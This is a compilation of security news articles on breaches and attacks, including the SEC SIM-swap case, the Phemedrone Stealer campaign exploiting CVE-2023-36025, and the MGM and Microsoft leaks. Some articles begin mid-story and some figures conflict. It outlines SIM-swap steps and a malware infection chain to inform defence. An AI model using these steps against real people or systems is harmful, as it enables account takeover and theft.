The Anatomy of the Attack: How Council Gained Access

SIM-Swapping: A Gateway to High-Profile Accounts

SIM-swapping, a well-documented form of social engineering, involves fraudulently transferring a victim’s phone number to a SIM card controlled by the attacker. This enables cybercriminals to bypass multi-factor authentication (MFA) mechanisms, gaining unauthorized access to digital accounts linked to the phone number.

In Council’s case, he targeted an individual responsible for managing the SEC’s social media accounts. By leveraging a fraudulent identification card, which he fabricated using an identification card printer, he impersonated the victim and successfully seized control of their cellular number.

Once in possession of the phone number, Council executed a password reset on the SEC’s X account, granting himself full control. He then transferred account access to co-conspirators, who compensated him with $50,000 in Bitcoin for his role in facilitating the breach.

The Fake Announcement & Market Manipulation

Shortly after gaining control over the SEC’s official X account, Council and his accomplices published a fabricated post falsely announcing the approval of Bitcoin Exchange-Traded Funds (ETFs). The now-infamous post read:

“Today the SEC grants approval to Bitcoin ETFs for listing on registered national security exchanges. The approved Bitcoin ETFs will be subject to ongoing surveillance and compliance measures to ensure continued investor protection.”

Given the SEC’s authoritative stance on cryptocurrency regulations, the deceptive announcement immediately triggered a spike in Bitcoin’s value, driving prices up by $1,000 in a matter of minutes. However, the celebration was short-lived, as SEC Chair Gary Gensler quickly disavowed the post, confirming that the agency’s account had been compromised. This revelation prompted a swift $2,000 drop in Bitcoin’s price, causing losses for traders who acted on the fraudulent information.

The SEC officially confirmed that a SIM-swapping attack was responsible for the breach, raising urgent concerns over the security of high-profile institutional accounts and the vulnerabilities of SMS-based authentication measures.

The Investigation: Council’s Digital Footprint Led to His Downfall

Following the incident, the FBI launched an extensive investigation, ultimately linking Council to the cyberattack. Forensic analysis of his personal computer revealed that he had conducted multiple searches relating to FBI investigations, including:

• “What are the signs that you are under investigation by law enforcement or the FBI even if you have not been contacted by them?”
• “How can I know for sure if I am being investigated by the FBI?”

These searches, along with evidence of his fraudulent ID card creation activities, provided authorities with sufficient grounds to arrest and charge him.

Legal Consequences: Maximum Five-Year Sentence Looms

After initially pleading not guilty, Council reversed course and pleaded guilty to charges of conspiracy to commit aggravated identity theft and access device fraud. Under federal sentencing guidelines, he faces a maximum penalty of five years in prison.

His sentencing hearing is scheduled for May 16, 2025, where the court will determine his final punishment. Given the severity of the financial impact and the national security implications, legal experts anticipate a harsh sentence to serve as a deterrent to future cybercriminals.

How a SIM-Swap Exploit Works: Technical Breakdown

1. Target Identification & Reconnaissance

• Attackers use OSINT (Open-Source Intelligence) techniques, social media scraping, and dark web data leaks to gather personal information.
• They look for phone numbers, email addresses, dates of birth, and security question answers from past breaches.

2. Gaining Personal Information for Social Engineering

• Cybercriminals phish victims or buy leaked credentials to obtain date of birth, address, and account PINs.
• If needed, they impersonate financial institutions or service providers to trick victims into revealing additional details.

3. Executing the SIM Swap with the Carrier

• The attacker calls the victim’s mobile provider, claiming their phone was lost or stolen.
• They use stolen personal details to verify their identity and convince customer support to transfer the phone number to a new SIM.
• Once the swap is completed, the victim loses service, while the attacker receives their calls and messages.

4. Account Takeover & Exploitation

• The attacker resets passwords for high-value accounts (email, crypto exchanges, financial services).
• They intercept SMS-based two-factor authentication codes, bypassing security measures.
• They take full control of accounts, locking out the original user and executing fraud or financial theft.

Mitigations: How to Prevent SIM-Swapping Attacks

1. Strengthen Mobile Carrier Security

Set a unique PIN or passphrase with your carrier for SIM changes.
Enable port-freezing or no-SIM-swap policies if your provider offers them.
Link security alerts to an alternate email or authentication app.

2. Avoid SMS-Based Multi-Factor Authentication (MFA)

Use app-based authenticators (Google Authenticator, Authy, Microsoft Authenticator).
Prefer security keys (YubiKey, Titan Key) for high-risk accounts.

3. Monitor & Lock Personal Data

Freeze your credit to prevent identity theft.
Enable real-time SMS/email alerts for suspicious logins or account changes.

4. Be Aware of Phishing & Social Engineering

Never share personal details over the phone unless you initiated the call.
Ignore suspicious SMS links or emails claiming “account security alerts.”
Regularly review security settings for sensitive accounts.

A Wake-Up Call for Cybersecurity & Financial Markets

The Council case underscores several critical cybersecurity vulnerabilities, particularly within financial institutions and regulatory bodies. It also serves as a warning that social engineering exploits, when combined with weak authentication protocols, can lead to high-impact financial fraud and market manipulation.

While individuals must take steps to protect themselves, mobile carriers, financial regulators, and social media platforms must enhance their security frameworks to reduce the risk of SIM-swapping attacks. The cryptocurrency and financial trading sectors, in particular, remain prime targets for cybercriminals seeking to exploit market movements for illicit gain.

With the SEC breach demonstrating the real-world consequences of inadequate security measures, organizations must move beyond SMS-based authentication and adopt stronger, more resilient security strategies. As cybercriminals evolve, so must the defensive measures protecting high-value targets.

The sentencing of Eric Council Jr. on May 16, 2025, will be a defining moment for law enforcement’s stance on cyber fraud—one that could shape the future of digital security policies across regulatory agencies, financial institutions, and telecommunications providers.

The post Hacker’s Google Search Gave Him Away – You Won’t Believe What He Looked Up! appeared first on Information Security Newspaper | Hacking News.

The post 50,000 Users Hacked via WhatsApp! appeared first on Information Security Newspaper | Hacking News.

This particular attack was extremely big—it was recorded at 5.6 terabits per second. To give you an idea, that’s an enormous amount of internet traffic being used to disrupt a service. The attack targeted an internet company in East Asia. The hackers used a tool called Mirai, which is a type of malware. This malware takes over devices like cameras or routers, and in this case, it controlled around 13,000 devices to launch the attack.

The attack lasted for only 80 seconds, but it was so powerful that it set a record. According to Cloudflare January 21, 2025 , which helps protect websites from attacks like these, managed to stop it without any disruption to the service. This attack was part of a larger trend. In the last few months, Cloudflare has noticed a sharp increase in these kinds of attacks. In just one quarter, they stopped almost 7 million attacks. Some of these attacks were smaller, but many were very large, with over 420 of them being bigger than 1 terabit per second. This shows how cyberattacks are getting more frequent and more dangerous.

The post Record breaking 5,600,000 megabits per second (Mbps) DDoS attack appeared first on Information Security Newspaper | Hacking News.

How it works

• Attackers created fake links that look like they are from YouTube. For example, the link might start with something like “hxxp[://]youtube” (instead of the usual “https://youtube”), making it seem real but hiding its true purpose.
  
• When someone clicks these fake links, they are secretly redirected through multiple websites before reaching the final fake page. This makes it harder for security systems to detect the phishing attempt.
  
• The final page looks like a legitimate login page, but when users enter their credentials, the attackers steal them.
• According to researchers, this specific campaign was likely conducted by a hacking group called Storm1747. They used a tool called “Tycoon 2FA phishing kit,” which is designed for large-scale attacks and can even bypass two-factor authentication.
  
  

How to protect

• Verify Links Before Clicking: Always check if a link is legitimate by hovering over it to see the full URL. Avoid clicking on suspicious or shortened links.
• Enable 2FA: Use two-factor authentication for all accounts, but be cautious of phishing attempts designed to bypass it.
• Use Antivirus and Anti-Phishing Tools: Install security software that can detect and block phishing sites.
• Educate Yourself and Others: Stay informed about the latest phishing tactics and share this knowledge with family and colleagues.
• Report Suspicious Activity: If you encounter a fake link or phishing attempt, report it to the website or service it claims to represent.

The post Phishing youtube channels and links are stealing credentials appeared first on Information Security Newspaper | Hacking News.

The Breach Explained

The breach was reportedly executed by a third-party merchant processor, which inadvertently allowed the sensitive information of American Express cardholders to leak onto the dark web. This exposed data includes American Express Card account numbers, expiration dates, and possibly other personal information, putting customers at risk of fraud and identity theft.

American Express has been proactive in addressing the situation, notifying affected customers and urging them to remain vigilant for signs of unauthorized activity on their accounts. Despite the breach, American Express has emphasized that its own systems were not compromised, pointing to the external nature of the security lapse.

Impact on Customers

The exposure of credit card details in a third-party data breach is a stark reminder of the vulnerabilities that exist within the digital financial ecosystem. For customers, this incident underscores the importance of monitoring their financial statements regularly and reporting any suspicious transactions immediately.

American Express has assured its customers that it is taking the necessary steps to mitigate the impact of the breach. This includes offering free credit monitoring services to affected individuals to help protect their financial information from further misuse.

Industry-Wide Concerns

This incident is not isolated, as data breaches involving third-party service providers have become increasingly common. The reliance on external vendors for processing financial transactions and handling sensitive data introduces additional risks that companies must manage. It highlights the need for stringent security measures and continuous vigilance to protect against cyber threats.

Moving Forward

In response to the breach, American Express and other financial institutions are likely to reassess their relationships with third-party vendors and enhance their security protocols to prevent similar incidents in the future. This may involve more rigorous vetting processes, the implementation of advanced cybersecurity technologies, and closer collaboration between companies and their service providers to ensure the highest standards of data protection.

For customers, the breach serves as a critical reminder of the need to be proactive in safeguarding their personal and financial information. This includes using strong, unique passwords for online accounts, enabling two-factor authentication where available, and being cautious of phishing attempts and other online scams.

The exposure of American Express credit card details in a third-party data breach is a concerning event that highlights the ongoing challenges in securing financial data. As the digital landscape evolves, so too do the tactics of cybercriminals, making it imperative for both companies and consumers to remain vigilant and proactive in their cybersecurity efforts. American Express’s commitment to addressing the breach and supporting its customers is a positive step, but it also serves as a call to action for the industry to strengthen its defenses against future threats.

Update from American Express

The incidents that you are inquiring about occurred at a merchant or merchant processor and were not an attack on American Express or an American Express service provider, as some media outlets have erroneously reported. Because customer data was impacted, American Express provided notice of the incidents to Massachusetts agencies and impacted customers who reside in Massachusetts.

American Express Card Members are not liable for fraudulent charges on their accounts. We have sophisticated monitoring systems and internal safeguards in place to help detect fraudulent and suspicious activity. If we see there is unusual activity that may be fraud, we will take protective actions. We also recommend customers regularly review and monitor their account activity, and immediately contact us if they detect any suspicious activity. For added protection, customers can receive free fraud and account activity alerts via email, SMS text messaging, and/or notifications through our app.

This blog post on the Massachusetts state website may shed a little more light on the different circumstances under which financial institutions may report incidents. For example, a financial institution may report an incident that occurred at a retailer where the consumer used their bank-issued card.

The post Are You Affected? American Express Credit Cards Compromised in Data Leak at a third-party service provider appeared first on Information Security Newspaper | Hacking News.

Immediate Actions and Remediation

Understanding the gravity of the situation, AnyDesk took decisive steps to mitigate the impact of the breach. The company has informed relevant authorities about the incident and is collaborating closely with them to ensure a comprehensive response. Notably, the incident was clarified not to be related to ransomware, which often targets such essential services for extortion purposes.

In a proactive move to secure its systems and user data, AnyDesk has revoked all security-related certificates. This step is crucial in preventing any further unauthorized access using the compromised credentials. The company is also in the process of revoking its previous code signing certificate for binaries, transitioning to a new certificate to ensure the integrity of its software.

Safeguarding User Data and Recommendations

AnyDesk reassures its users that its systems are architecturally designed to avoid storing sensitive information like private keys, security tokens, or passwords that could potentially be used to access end-user devices. This design philosophy is pivotal in limiting the potential exploitation scope of such breaches.

As an additional precautionary measure, AnyDesk is revoking all passwords to its web portal, my.anydesk.com. Users are strongly encouraged to change their passwords, especially if the same credentials are used across multiple platforms. This recommendation aims to prevent any possibility of credential stuffing attacks, where attackers use stolen credentials to gain unauthorized access to other accounts.

Moving Forward

AnyDesk’s swift and transparent response to the security breach underscores its commitment to user security and trust. By involving industry-leading cybersecurity experts and working closely with law enforcement, AnyDesk demonstrates its dedication to maintaining the highest security standards.

The incident serves as a reminder of the persistent cybersecurity threats facing remote access software providers and the importance of robust security measures. AnyDesk’s actions following the breach provide a blueprint for effective incident response and remediation, reinforcing the security of its systems against future threats.

Users and stakeholders are advised to stay tuned to official AnyDesk communications for further updates and recommendations on safeguarding their accounts and data.

The post How AnyDesk’s Latest Hack Could Affect You and What to Do Next appeared first on Information Security Newspaper | Hacking News.

CVE-2023-36025 arises from insufficient checks on Internet Shortcut (.url) files, allowing attackers to bypass Windows Defender SmartScreen warnings by using crafted .url files that download and execute malicious scripts . Microsoft patched this vulnerability on November 14, 2023, but its exploitation in the wild led to its inclusion in the Cybersecurity and Infrastructure Security Agency’s Known Exploited Vulnerabilities list. Various malware campaigns, including those distributing Phemedrone Stealer, have since incorporated this vulnerability.

Initial Access via Cloud-Hosted Malicious URLs

As per the report, this involves leveraging cloud-hosted URLs that are malicious in nature. The article provides insights into how these URLs are used to initiate the attack, highlighting the strategies employed for distributing the malware and penetrating target systems. Attackers host malicious Internet Shortcut files on platforms like Discord or cloud services, often disguised using URL shorteners. Unsuspecting users who open these files trigger the exploitation of CVE-2023-36025.

Defense Evasion Tactics

The malicious .url file downloads and executes a control panel item (.cpl) file from an attacker-controlled server. This bypasses the usual security prompt from Windows Defender SmartScreen. The malware employs MITRE ATT&CK technique T1218.002, using the Windows Control Panel process binary to execute .cpl files, which are essentially DLL files.

1. Initial Infection via Malicious .url File (CVE-2023-36025): The attack begins when a user executes a malicious Internet Shortcut (.url) file. This file is designed to bypass Microsoft Windows Defender SmartScreen warnings, typically triggered for files from untrusted sources. The evasion is likely achieved by manipulating the file’s structure or content, making it appear benign.
2. Execution of a Control Panel Item (.cpl) File: Once executed, the .url file connects to an attacker-controlled server to download a .cpl file. In Windows, .cpl files are used to execute Control Panel items and are essentially Dynamic Link Libraries (DLLs). This step involves the MITRE ATT&CK technique T1218.002, which exploits the Windows Control Panel process binary (control.exe) to execute .cpl files.
3. Use of rundll32.exe for DLL Execution: The .cpl file, when executed through control.exe, then calls rundll32.exe, a legitimate Windows utility used to run functions stored in DLL files. This step is critical as it uses a trusted Windows process to execute the malicious DLL, further evading detection.
4. PowerShell Utilization for Payload Download and Execution: The malicious DLL acts as a loader to call Windows PowerShell, a task automation framework. PowerShell is then used to download and execute the next stage of the attack from GitHub.
5. Execution of DATA3.txt PowerShell Loader: The file DATA3.txt, hosted on GitHub, is an obfuscated PowerShell script designed to be difficult to analyze statically (i.e., without executing it). It uses string and digit manipulation to mask its true intent.
6. Deobfuscation and Execution of the GitHub-Hosted Loader: Through a combination of static and dynamic analysis, the obfuscated PowerShell commands within DATA3.txt can be deobfuscated. This script is responsible for downloading a ZIP file from the same GitHub repository.
7. Contents of the Downloaded ZIP File:
   • WerFaultSecure.exe: A legitimate Windows Fault Reporting binary.
   • Wer.dll: A malicious binary that is sideloaded (executed in the context of a legitimate process) when WerFaultSecure.exe is run.
   • Secure.pdf: An RC4-encrypted second-stage loader, presumably containing further malicious code.

This attack is sophisticated, using multiple layers of evasion and leveraging legitimate Windows processes and binaries to conceal malicious activities. The use of GitHub as a hosting platform for malicious payloads is also noteworthy, as it can lend an appearance of legitimacy and may bypass some network-based security controls.

Persistence and DLL Sideloading

The malware achieves persistence by creating scheduled tasks and uses DLL sideloading techniques. The malicious DLL, crucial for the loader’s functionality, decrypts and runs the second stage loader. It uses dynamic API resolving and XOR-based algorithms for string decryption, complicating reverse engineering efforts.

1. Malicious DLL (wer.dll) Functionality: It decrypts and runs a second-stage loader. To avoid detection and hinder reverse engineering, it employs API hashing, string encryption, and is protected by VMProtect.
2. DLL Sideloading Technique: The malware deceives the system into loading the malicious wer.dll by placing it in the application directory, a method that exploits the trust Windows has in its own directories.
3. Dynamic API Resolving: To avoid detection by static analysis tools, the malware uses CRC-32 hashing for storing API names, importing them dynamically during runtime.
4. XOR-based String Decryption: An algorithm is used to decrypt strings, with each byte’s key generated based on its position. This method is designed to complicate automated decryption efforts.
5. Persistence Mechanism: The malware creates a scheduled task to regularly execute WerFaultSecure.exe. This ensures that the malware remains active on the infected system.
6. Second-Stage Loader (secure.pdf): It’s decrypted using an undocumented function from advapi32.dll, with memory allocation and modification handled by functions from Activeds.dll and VirtualProtect.
7. Execution Redirection through API Callbacks: The malware cleverly redirects execution flow to the second-stage payload using Windows API callback functions, particularly exploiting the CryptCATCDFOpen function.

Overall, this malware demonstrates a deep understanding of Windows internals, using them to its advantage to stay hidden and maintain persistence on the infected system. The combination of techniques used makes it a complex and dangerous threat.

Second-Stage Defense Evasion

The second-stage loader, known as Donut, is an open-source shellcode that executes various file types in memory. It encrypts payloads without compression and uses the Unmanaged CLR Hosting API to load the Common Language Runtime, creating a new Application Domain for running assemblies.Here’s an overview of how Donut is used for defense evasion and payload execution:

1. Donut Shellcode Loader:
   • Capabilities: Allows execution of VBScript, JScript, EXE files, DLL files, and .NET assemblies directly in memory.
   • Deployment Options: Can be embedded into the loader or staged from an HTTP or DNS server. In this case, it’s embedded directly into the loader.
2. Payload Compression and Encryption:
   • Compression Techniques: Supports aPLib, LZNT1, Xpress, and Xpress Huffman through RtlCompressBuffer.
   • Encryption: Uses the Chaskey block cipher for payload encryption. In this instance, only encryption is used, without compression.
3. Execution Process via Unmanaged CLR Hosting API:
   • CLR Loading: Donut configures to use the Unmanaged CLR Hosting API to load the Common Language Runtime (CLR) into the host process.
   • Application Domain Creation: Creates a new Application Domain, allowing assemblies to run in disposable AppDomains.
   • Assembly Loading and Execution: Once the AppDomain is prepared, Donut loads the .NET assembly and invokes the payload’s entry point.

The use of Donut in this attack is particularly notable for its ability to execute various types of code directly in memory. This method greatly reduces the attack’s visibility to traditional security measures, as it leaves minimal traces on the filesystem. Additionally, the use of memory-only execution tactics, coupled with sophisticated encryption, makes the payload difficult to detect and analyze. The ability to create and use disposable AppDomains further enhances evasion by isolating the execution environment, reducing the chances of detection by runtime monitoring tools. This approach demonstrates a high level of sophistication in evading defenses and executing the final payload stealthily.

Phemedrone Stealer Payload Analysis

Phemedrone Stealer initializes its configuration and decrypts items like Telegram API tokens using the RijndaelManaged symmetric encryption algorithm. It targets a wide range of applications to extract sensitive information, including Chromium-based browsers, crypto wallets, Discord, FileGrabber, FileZilla, Gecko-based browsers, system information, Steam, and Telegram.

Command and Control for Data Exfiltration

After data collection, the malware compresses the information into a ZIP file and validates the Telegram API token before exfiltrating the data. It sends system information and statistics to the attacker via the Telegram API. Despite the patch for CVE-2023-36025, threat actors continue to exploit this vulnerability to evade Windows Defender SmartScreen protection. The Phemedrone Stealer campaign highlights the need for vigilance and updated security measures against such evolving cyber threats.

Mitigation

Mitigating the risks associated with CVE-2023-36025 and similar vulnerabilities, especially in the context of the Phemedrone Stealer campaign, involves a multi-layered approach. Here are some key strategies:

1. Apply Security Patches: Ensure that all systems are updated with the latest security patches from Microsoft, particularly the one addressing CVE-2023-36025. Regularly updating software can prevent attackers from exploiting known vulnerabilities.
2. Enhance Endpoint Protection: Utilize advanced endpoint protection solutions that can detect and block sophisticated malware like Phemedrone Stealer. These solutions should include behavior-based detection to identify malicious activities.
3. Educate Users: Conduct security awareness training for all users. Educate them about the dangers of clicking on unknown links, opening suspicious email attachments, and the risks of downloading files from untrusted sources.
4. Implement Network Security Measures: Use firewalls, intrusion detection systems, and intrusion prevention systems to monitor and control network traffic based on an applied set of security rules.
5. Secure Email Gateways: Deploy email security solutions that can scan and filter out malicious emails, which are often the starting point for malware infections.
6. Regular Backups: Regularly back up data and ensure that backup copies are stored securely. In case of a malware infection, having up-to-date backups can prevent data loss.
7. Use Application Whitelisting: Control which applications are allowed to run on your network. This can prevent unauthorized applications, including malware, from executing.
8. Monitor and Analyze Logs: Regularly review system and application logs for unusual activities that might indicate a breach or an attempt to exploit vulnerabilities.
9. Restrict User Privileges: Apply the principle of least privilege by limiting user access rights to only those necessary for their job functions. This can reduce the impact of a successful attack.
10. Incident Response Plan: Have a well-defined incident response plan in place. This should include procedures for responding to a security breach and mitigating its impact.
11. Use Secure Web Gateways: Deploy web gateways that can detect and block access to malicious websites, thereby preventing the download of harmful content.
12. Regular Security Audits: Conduct regular security audits and vulnerability assessments to identify and address potential security gaps in the network.

By implementing these measures, organizations can significantly reduce their risk of falling victim to malware campaigns that exploit vulnerabilities like CVE-2023-36025.

The post How to exploit Windows Defender Antivirus to infect a device with malware appeared first on Information Security Newspaper | Hacking News.

The database had an enormous quantity of medical test results, which included the names of patients, physicians, and other sensitive health information such as the location of where the testing sample was performed (at home or at a medical institution), amongst a broad variety of other information. There were a substantial amount of records overall, with a total count of 12,347,297 and a total size of 7 terabytes (TB). After additional research, it was discovered that the papers included a watermark indicating that they belonged to a corporation situated in India known as Redcliffe Labs. I did not waste any time in sending a responsible disclosure notification, and I was promptly rewarded with a response that acknowledged my finding and thanked me for my efforts. It is unknown how long the information was available to the public or whether any unauthorised persons viewed the supposed health records before public access was limited the same day. However, public access was restricted the same day. On the other hand, the database included a folder labelled “test results” that held more than six million PDF documents. This may point to either the fact that a much larger number of consumers were possibly impacted or the possibility that there were repeated tests from the same customers.

The Digital Personal Data Protection Act, 2023 (DPDP Act) is the name of a broad new privacy legislation that was passed into law in India in the month of August 2023. The Data Protection and Development Act (DPDP) is India’s first all-encompassing data protection legislation. It addresses a broad variety of data-related concerns and is applicable to any business that conducts operations inside India or whose clients are located in India.

Companies that have experienced a data breach are required under the DPDP Act to notify the relevant authorities as well as the people whose personal information was compromised within the first 72 hours after the breach has been identified and validated. In addition, the DPDP Act includes a provision that levies monetary fines on businesses that do not adhere to the newly implemented standards. The fines may vary anywhere from INR 10,000 (about equivalent to USD 120) to INR 250 crore (roughly equivalent to USD 30.2 million).

As of the time that this article was published, it is unknown if Redcliffe Labs has informed the appropriate authorities or the people who might possibly be impacted by the data disclosure that occurred earlier. There were a total of 12,347,297 entries in the database, which had a total size of seven terabytes Documents that were categorised as “Reports” had a total number of objects of 1,180,000 and a total size of 620.5 gigabytes. These, too, were test findings, and the report seemed to be in its most basic form; there was no header logo.

Intelligent Report Archiving: There are a total of 1,164,000 items, and their combined size is 1.5 terabytes. The findings of the exam were presented in these publications in an info-graphic format.

“Test results” folder contains the following: There are a total of 6,090,852 items, and their combined size is 2.2 terabytes.

A variety of other folders, each holding files that are not password protected: There are 3,912,445 items in all, and their combined size is 2.7 gigabytes. These folders included a total of.PDF files, papers used internally by the company, logging data, mobile application development files, and other types of files.

The database not only housed millions of medical records, but it also held the development files from their mobile application. Leaving application files open to the public presents the possibility of a serious danger falling into the wrong hands. The functionality of an application as well as the data that is sent from the user to the host server may be controlled by these files. This information or these files might possibly be used by malicious actors to carry out a variety of assaults, which could jeopardise the data of users, the operation of applications, or the security of the mobile device itself.

The alteration or change of the application’s source code files is one of the most significant potential threats. The files might be altered in such a way as to incorporate a malicious code execution, which would make it possible for hackers to undermine the app’s integrity and security, inject malware, or add additional features without authorization. As soon as the code has been altered, malicious actors have the opportunity to steal or get access to a patient’s confidential data, which may include the results of tests, scans, or other sensitive information. If hackers were to obtain access to a user’s health and medical testing information, this might lead to major abuses of the user’s privacy. In addition, accessible code or resource files might theoretically be used in reverse engineering, analysis, or decompilation of the application in order to get insight into how the programme operates. It’s possible that this may lead to the discovery of new vulnerabilities and weaknesses that can be used in the future for malicious purposes.

The post Redcliffe Labs, India’s Medical Diagnostic Company leaks 7 TB of customer data. Will it pay 250 crore fine? appeared first on Information Security Newspaper | Hacking News.

MGM Resorts encountered a devastating cyberattack recently, incurring an approximate financial setback of $100 million. Unveiled on September 11, this digital attack led to the temporary shutdown of multiple systems within MGM’s various properties, disrupting operations and inflicting significant monetary losses.

Details of the Attack

The digital onslaught on MGM Resorts wasn’t confined to a single property but spread across its flagship resort and other prestigious properties like Mandalay Bay, Bellagio, The Cosmopolitan, and Aria. The cybercriminals managed to disrupt a range of operations, from the functioning of slot machines and the systems overseeing restaurant management to the technology behind room key cards. Despite the containment efforts by MGM, the attackers successfully exfiltrated a diverse set of customer data, including but not limited to names, addresses, phone numbers, driver’s license numbers, Social Security numbers, and passport details. Fortunately, credit card details remained secure and unaffected.

Economic Fallout

The cyber intrusion had a profound economic impact on MGM Resorts, with losses estimated around $100 million. This financial blow is anticipated to ripple through the earnings of the third and fourth fiscal quarters. However, MGM remains optimistic, projecting a 93% occupancy rate in October and planning for a complete operational recovery in Las Vegas by November. Expenses related to the cyberattack, including consultancy fees, legal services, and other related costs, amounted to less than $10 million.

Compromise of Customer Data

A vast array of customer data, from Social Security numbers to passport details, was pilfered during the cyber attack. The total count of individuals affected by this breach remains uncertain as MGM has not issued any comments on this matter. Proactive measures have been initiated by MGM Resorts to assist the victims of this data breach, including the establishment of dedicated phone lines and informational websites. The company also intends to reach out to the affected individuals via email, extending offers for identity protection services.

Identity of the Attackers

Initially, the cyberattack was attributed to hackers affiliated with a group known as Scattered Spider. This group later joined forces with a Russian ransomware collective known as Black Cat/AlphV. Scattered Spider has a notorious reputation, being implicated in several major cyberattacks over the past year, targeting entities like Reddit, Riot Games, Coinbase, and even another major player in the casino industry, Caesars Entertainment.

Recovery and Response

In response to the cyberattack, MGM Resorts took immediate action by shutting down all its systems to thwart further unauthorized access to customer data. Since these initial countermeasures, the company’s domestic properties have seen a return to normalcy in operations, with the majority of systems that interact with guests being restored. Efforts are ongoing to bring the remaining affected systems back online, with full restoration anticipated in the near future.

Conclusion and Future Implications

The cyberattack experienced by MGM Resorts highlights the substantial risks and potential financial damages associated with digital security breaches in the hospitality sector. With the compromise of sensitive customer information and the incurrence of hefty financial losses, this incident serves as a stark reminder for all businesses in the industry to bolster their cybersecurity infrastructure to safeguard against future digital threats. The episode underscores the imperative for continuous investments in state-of-the-art cybersecurity mechanisms and protocols to preemptively mitigate the risks of future cyber-attacks and protect sensitive customer data.

The post How MGm Resorts lost $100 million as a result of a simple vishing call appeared first on Information Security Newspaper | Hacking News.

Wiz made the discovery that this account included 38 terabytes worth of confidential Microsoft data, which included the following:

Backups of the machines used by employees, which may include passwords, secret keys, and internal communications sent via Microsoft Teams.

Over 30,000 private communications sent by 359 Microsoft workers using the Microsoft Teams platform. The underlying problem was that Azure Shared Access Signature (SAS) tokens were being used without the appropriate permissions being scoped. Access to Azure storage accounts may be controlled at a finer grain using SAS tokens. On the other hand, if the configuration is not done correctly, they might provide an excessive number of permissions. A Shared Access Signature (SAS) token in Azure is described as a signed URL that provides access to Azure Storage data by the Wiz team. This information can be found on the Azure website. The user is able to modify the access level to their liking; the permissions may vary from read-only to full control, and the scope can be a single file, a container, or the whole storage account.

Additionally, the user has total control over the expiration time, giving them the ability to generate access tokens that never expire.

Instead of providing read-only access to the storage account, the token in this instance granted complete control of the contents of the account. In addition, there was no date of expiration, which meant that access would be granted forever.As a result of a deficiency in monitoring and control, SAS tokens provide a potential threat to data security; hence, their use should be restricted to the greatest extent feasible. Because Microsoft does not provide a centralized method to handle these tokens inside the Azure interface, keeping track of them may be an extremely difficult task. In addition, the duration of these tokens may be customized to practically endure forever, and there is no maximum age at which they can be used. Consequently, it is not a secure practice to use Account SAS tokens for external sharing, and users should refrain from doing so. – In addition, the Wiz Research Team said.

Because there is a lack of control, Wiz suggests putting restrictions on how account-level SAS tokens may be used. In addition, separate storage accounts should be used for any and all reasons involving external sharing. It is also recommended to do appropriate monitoring as well as security evaluations of shared data.

Since then, Microsoft has invalidated the exposed SAS token and carried out an internal evaluation of the damage it may have. Additionally, an acknowledgment of the occurrence can be found in a recent blog post written by the corporation.

Because more of an organization’s engineers are now working with enormous volumes of training data, this story illustrates the additional dangers that businesses face when beginning to utilize the capability of artificial intelligence more generally. The enormous volumes of data that data scientists and engineers work with need extra security checks and precautions as they work to get innovative AI solutions into production as quickly as possible.

The post Microsoft AI team leaks 38 GB of confidential data, including employees disk backup appeared first on Information Security Newspaper | Hacking News.

The IT team at the National Science Foundation’s NOIRLab discovered suspicious behavior in the laboratory’s computer systems early on the morning of August 1. This led to the decision to temporarily halt activities at the huge optical infrared telescopes located on Hawaii’s Maunakea for the sake of safety.

The ‘double’ telescope located in the southern Andes of Chile was already in the process of being prepped for maintenance and required very little more work.

Even while it is unclear what kind of threat, if any, the telescopes themselves would have been exposed to, this threat serves as a reminder that doing scientific research is an expensive endeavor, with astronomical research facilities needing yearly budgets that can easily reach into the millions of dollars.

There is a cost incurred by the scientific community for each day that passes with the facilities being unavailable to researchers. Not just monetarily, but also in terms of the data that was lost.

Because astronomical studies sometimes need activities to be precisely scheduled, disturbances like this have the ability to completely derail whole research efforts if a sufficient number of important observation windows are missed.

Even though this is one of the first ransomware intrusions on a scientific research institution, hacks against astronomical facilities aren’t exactly unheard of.

Hackers gained access to the Atacama Large Millimeter Array Observatory in Chile through a virtual private network in October 2022, which resulted in the facility being forced to shut down for many months at a cost of around US$250,000 per day.

It is assumed that the purpose of the “particularly sophisticated” hack had been to extract money from the observatory’s consortium of operators. This is consistent with the suspicion that the intrusion was a ransomware attempt.

In its most recent statement, the lab said that it was “continuing its efforts to diligently investigate and resolve the cybersecurity incident that occurred on its computer systems on August 1st.”

Many helpful resources, like the website Gemini.edu, were unavailable to scientists and amateurs as a result of the tragedy.

“Our team is collaborating with cybersecurity specialists to quickly restore internet access to all affected telescopes and our website, and we are pleased with the results thus far. We are unhappy that several of our telescopes are not now watching, as is the whole astronomical community, according to NOIRLab.

Since the notional launch date was set for August 31, the Lab was compelled to postpone a Gemini Call for Proposals for the Semester beginning on February 1 of the following year.

“We continue to make data available via our website because we think that open access and information sharing are essential for good scientific cooperation. The Lab states that “we are constrained in what we can reveal about our cybersecurity measures and investigative results since our investigation into this issue is continuing.

Several years prior to that, an unlicensed Raspberry Pi that was linked to computers at NASA’s Jet Propulsion Laboratory enabled unlawful access to the Deep Space Network. As a result of this, the Johnson Space Center was forced to withdraw their own mission systems from the gateway entirely.

More money will be required to safeguard the information technology at the center of the scientific infrastructure for researching the universe as projects increase in scope and complexity and in size, as well as as attacks become more sophisticated.

The post Two world’s biggest telescopes hacked by Ransomware attack appeared first on Information Security Newspaper | Hacking News.

Forever 21 disclosed, in a short statement that was published on the company’s website, that it had obtained information from a third party indicating that the company’s security may have been breached. There are around 500 physical sites of Forever 21, in addition to an online shop. After a large-scale theft of credit card details from its shop point-of-sale equipment in 2017, this is the second data breach that has occurred in recent years for the company.

After further examination, it was discovered that despite the fact that the firm had implemented encryption and enhanced security measures in 2015 in response to a string of attacks against other shops, “certain point of sale devices in some Forever 21 stores were affected” because encryption “was not in operation.”

According to the firm, it is currently in the process of collecting evidence, and it is too soon to release any other information at this time, including which specific locations may have been compromised and the time periods during which consumers may have been placed at danger.In 2008, the United States Department of Justice brought charges against a group of individuals who were responsible for stealing the credit card information of hundreds of millions of customers from large stores such as TJ Maxx, Barnes & Noble, Boston Market, and Forever 21.

Forever 21 alerted 539,207 persons, according to the notification, that the data breach included their name, date of birth, bank account number, and Social Security number, as well as information about workers’ Forever21 health plan, including enrollment and premiums paid.

Forever 21 did not provide any further details on the issue beyond the fact that one of its computer systems had been compromised, but the company did say that “Forever 21 has taken steps to help assure that the unauthorized third party no longer has access to the data.” It is not quite obvious how Forever 21 came to declare that they have assurance. Because of the notice’s unclear phrasing, it is possible to infer that the corporation paid the hacker in return for the data being deleted.

The post Forever 21, fashion company hacked, customer personal data leaked appeared first on Information Security Newspaper | Hacking News.